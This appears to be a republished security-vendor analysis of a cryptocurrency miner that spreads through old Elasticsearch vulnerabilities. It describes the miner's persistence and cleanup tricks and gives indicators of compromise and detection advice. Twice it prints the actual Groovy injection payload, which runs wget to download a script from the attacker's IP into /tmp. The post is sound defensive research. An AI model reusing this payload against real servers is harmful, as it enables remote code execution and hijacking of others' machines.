Cryptocurrency Miner Spreads via Old Vulnerabilities on Elasticsearch

by Jindrich Karasek and Loseway Lu

We detected mining activity on our honeypot that involves the search engine Elasticsearch, which is a Java-developed search engine based on the Lucene library and released as open-source. The attack was deployed by taking advantage of known vulnerabilities CVE-2015-1427, a vulnerability in its Groovy scripting engine that allows remote attackers to execute arbitrary shell commands through a crafted script, and CVE-2014-3120, a vulnerability in the default configuration of Elasticsearch. The vulnerable versions are no longer supported by Elasticsearch.

We found a search query with the following command (also described in a blog by ISC) on a server running Elasticsearch:

“{“lupin”:{“script”: “java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P
/tmp/sssooo\”).getText()”}}}”

The command was run by the same system/attacking host, which also hosted the payload. At the time of writing, the IP is resolved to the domain name matrixhazel[.]com, which was inaccessible. The system was also found to have installed CentOS 6, which runs both web and SSH servers.

Figure 1. GreyNoise marked the host as a known scanner

Figure 1. GreyNoise marked the host as a known scanner

It is important to note that this kind of attack is not new, but it has recently reemerged. For instance, Trend Micro Smart Protection Network feedback in November detected the cryptocurrency miner on endpoints in several countries such as China, Taiwan, and the United States.

The miner distributes the bash script update.sh by first invoking the shell and running the download command with output set in the “/tmp/sssooo” file. “/tmp” is used because it has less restrictive permissions on most systems by default.

This attack is relatively simple, yet can have a significant impact on the victim. Once the attacker gains the ability to run arbitrary commands on the system, he can attempt to escalate the privileges or even pivot to other systems in order to compromise the network further.

It should also be noted that while the scheme of the attack is the same in most cases, the payloads might differ. In this case that we analyzed, the payload was the file update.sh. Once run, the bash script update.sh downloads two files called devtools and config.json. The script then deploys the cryptocurrency miner (detected by Trend Micro as Coinminer.Linux.MALXMR.UWEIS).

The actual file with the miner’s ELF64 binary is named devtools, which helps disguise the miner, as “devtools” is also a regular tool on GitHub. The miner uses a configuration as stated in the file config.json.

Figure 2. Details of the configuration file config.json

Figure 2. Details of the configuration file config.json

Such a scheme is already widely used, but the wrapper bash script has several other interesting functions. The coding style is very similar to hacking tools, and parts of the code were also spotted in an Xbash-related case before.

How the cryptocurrency miner is deployed

The miner consists of three files, downloaded through either wget, curl, or url commands in bash:

Figure 3. wget, curl, and url commands

Figure 3. wget, curl, and url commands

The miner is capable of downloading the following:

  • Devtools – The actual miner;
  • Update.sh – The bash script used to download all the parts (The script is also run during the attack.);
  • Config.json – The configuration file for the miner.

First, it attempts to save the files into the “/etc/” directory, and tries the “/tmp” in case it fails. The latter was the success in our case. After that, it checks for other ongoing mining activity in the machine. It assumes the device has already been attacked, and hijacks the machine from its previous attacker. This process may also be used to update the running miner to a newer version.

Figure 4. Sample of commands that allow the miner to eliminate other existing miners

Figure 4. Sample of commands that allow the miner to eliminate other existing miners

If it detects other miners in the system, the running processes related to the miners will be killed. It also resets the crontab so cron won’t start other miners again.

Figure 5. Processes of other miners found in the system will be killed

Figure 5. Processes of other miners found in the system will be killed

The miner adds itself to the crontab so it’s run every 10 minutes. At the beginning of each run, it unlocks itself with “chattr -i“ and updates its files, while at the end of each run it protects the files with “chattr +i” which serves to prevent the file from modification or removal by other low privilege users. It also cleans its tracks by emptying the history logs (as seen in Figure 8). One interesting point is when the script is running in the root directory, the script tries to add its own SSH key to the authorized_keys, which allows it to login without a password. Somehow the command order looks buggy, causing the removal of authorized_keys right after the key is added.

Figure 6. Other miner capabilities: components protection, persistence via crontab, and network traffic encryption

Figure 6. Other miner capabilities: components protection, persistence via crontab, and network traffic encryption

Figure 7. Miner modifies the iptables/firewall in the system

Figure 7. Miner modifies the iptables/firewall in the system

Figure 8. Miner cleans its track by removing the history and emptying files

Figure 8. Miner cleans its track by removing the history and emptying files

Conclusion and Recommendations

To prevent attacks that exploit known vulnerabilities in Elasticsearch, it is necessary to patch systems regularly and have security monitoring in place with custom rules, which allows for the detection of basic events as well as complex alerts.

There are variations to the command injected in Elasticsearch as spotted in the wild, but they have these factors in common:

  • They all invoke shell to run a command;
  • They all contain a command to download a file from remote/local locations, like curl, wget, url, ftp/get, and so on;
  • They download the file into either “/etc” or “/tmp”;
  • They are usually tried in sequence as the host tries to use all combinations of download file locations and commands to be run on local system (in order to download the malicious file).

Detection of related attacks is crucial and should be done through these measures:

  • Log Elasticsearch usage and monitor for strings that may suggest command injection.
  • Monitor the system’s behavior. Shell should only be used by authorized users and solutions.
  • Classify network traffic through correlation. In our case, malicious IP would be regularly called every 10 minutes. This should be easy to spot with the right network monitoring process and traffic analysis in place.

Users can consider adopting security solutions that can defend against cryptocurrency-mining malware through a cross-generational blend of threat defense techniques. Trend Micro™ XGen™ security provides high-fidelity machine learning that can secure the gateway and endpoints, and protect physical, virtual, and cloud workloads. With technologies that employ web/URL filtering, behavioral analysis, and custom sandboxing, XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities. XGen security also powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.

Indicators of Compromise (IoCs)

Related hashes (SHA-256)
191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c devtools Coinminer.Linux.MALXMR.UWEIS
d3e1231d1429dccb47caf0c1c46d2eb24afe33887b31a818b8f07f0406db2637 update.sh Coinminer.SH.MALXMR.ATNL

69.30.211.82 – attacker
69.30.203.170

Command used in Elasticsearch:

“{“lupin”:{“script”: “java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P /tmp/sssooo\”).getText()”}}}”

Spoofed Elasticsearch version number: 1.4.1

The post Cryptocurrency Miner Spreads via Old Vulnerabilities on Elasticsearch appeared first on .

Read more: Cryptocurrency Miner Spreads via Old Vulnerabilities on Elasticsearch

Incoming search terms

Story added 12. December 2018, content source with full text you can find at link above.